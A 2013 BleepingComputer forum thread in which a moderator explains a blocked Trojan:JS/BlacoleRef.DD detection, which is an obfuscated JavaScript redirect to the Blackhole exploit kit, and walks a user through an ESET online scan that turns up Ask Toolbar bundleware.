Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Want to make sure MSE really blocked trojan


  • Please log in to reply
5 replies to this topic

#1 Renee32

Renee32

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:02:23 AM

Posted 25 June 2013 - 09:00 AM

Hi,

  I was online last night and got a notification from Microsoft Security Essentials that a trojan was blocked and quarantined. When I went into MSE it showed Trojan:JS/Blacoleref.DD in the quarantine file. I clicked 'remove' to get rid of it. I then did full scans with MSE, Malwarebytes, and SuperAntiSpyware which all came back negative except for some tracking cookies on SAS. I shut the computer down overnight and re-ran quick scans of all three this morning - still negative. My computer seems to be functioning normally and MSE's status says 'protected', but it sounds like this is a particularly nasty trojan that is good at hiding and I want to make sure it is really gone. Is there another scan that I should run, or can I trust that MSE successfully blocked it? Thank you so much for your help.



BC AdBot (Login to Remove)

 


#2 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,386 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:03:23 AM

Posted 25 June 2013 - 12:50 PM

The word obfuscated means to make obscure, unclear, altered or modified. When that term is used in conjunction with Java it means to obscure the real meaning and intent of JavaScript code. Obfuscated JavaScript code can be found inserted into compromised webpages by attackers who attempt to infect visitors with vulnerable or unprotected computers. Depending on the anti-virus vendor such a detection will have various names but essentially mean the same thing.
 

Trojan:JS/BlacoleRef.DD is a detection name for an obfuscated JavaScript, often found inserted into compromised websites. This threat is designed to load a hidden IFrame that loads behind the user's browser, redirecting it to an exploit server known as "Blackhole"...There are no common symptoms associated with this threat - links are activated within IFrames while viewing web content on maliciously modified pages. Alert notifications from installed antivirus software may be the only symptoms....A user may be infected when they visit a compromised webpage. A vulnerable webpage may allow an attacker to successfully inject a client-side script, which then executes when a user visits the compromised page.

About Trojan:JS/BlacoleRef.DD

If your anti-virus provided a warning for an obfuscated JavaScript while you were surfing a website, most likely that type of threat was blocked/quarantined and there is nothing else to remove.

If you want to perform a more thorough browser clean up, please refer to:Then perform a scan with Eset Online Anti-virus Scanner. <- This process may may take several hours, that is normal
  • Click the esetonlinebtn.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the icon on your desktop.

    esetsmartinstaller_enu.png

  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and Remove found threats.
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer.
  • Please be patient as the scan can take some time to complete...close all programs and do NOT use the computer while the scan is running.
  • When the scan completes, click List Threats
  • Copy and paste the information in your next reply. If no malware was found you will not get a log.
  • Click the Back button.
  • Click the Finish button.
Note: If you recognize any of the detections as legitimate programs, it's possible they are "false positives" and you can ignore them or get a second opinion if you're not sure. Eset's detection rate is high and can include legitimate files which it considers suspicious, a Risk Tool, Hacking Tool, Potentially Unwanted Program, a possible threat or even Malware (virus/trojan) when that is not the case.
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#3 Renee32

Renee32
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:02:23 AM

Posted 25 June 2013 - 03:43 PM

Hi Janitor,

  Thanks for your reply! I did run ESET and it did not find anything related to Blacole, but did find other malware that it quarantined/removed. The log is below.

 

C:\Users\Home\AppData\Local\Temp\pkg_173c3270\AskTB\ApnIC.dll    a variant of Win32/Bundled.Toolbar.Ask application    cleaned by deleting - quarantined
C:\Users\Home\AppData\Local\Temp\pkg_173c3270\AskTB\asktbdet.zip    a variant of Win32/Bundled.Toolbar.Ask application    deleted - quarantined
C:\Users\Home\Downloads\U_0087_01_P.msi    a variant of Win32/Bundled.Toolbar.Ask application    deleted - quarantined
C:\Windows\Installer\141331a.msi    a variant of Win32/Bundled.Toolbar.Ask application    deleted - quarantined
 



#4 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,386 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:03:23 AM

Posted 25 June 2013 - 06:54 PM

Those detections are related to an Ask Toolbar distributed by Ask Jeeves.

Many toolbars, Add-ons, screensavers, and weather monitoring programs come bundled with other software (often without the knowledge of the user) and can be the source of various issues and problems to include Adware/browser hijacking. Even if advised of a toolbar, many folks do not know that it is optional and NOT necessary to install in order to operate the program.

I would have recommended you remove it anyway. Why?
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#5 Renee32

Renee32
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:02:23 AM

Posted 25 June 2013 - 07:54 PM

Thanks Quietman7 (sorry, thought 'Janitor' was your username :) ). I remember fighting an unwanted toolbar a while ago - that might have been it. I should be good for now. Thanks for all that you do on this forum!



#6 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,386 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:03:23 AM

Posted 25 June 2013 - 08:00 PM

You're welcome.

:thumbup2: Tips to protect yourself against malware and reduce the potential for re-infection
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users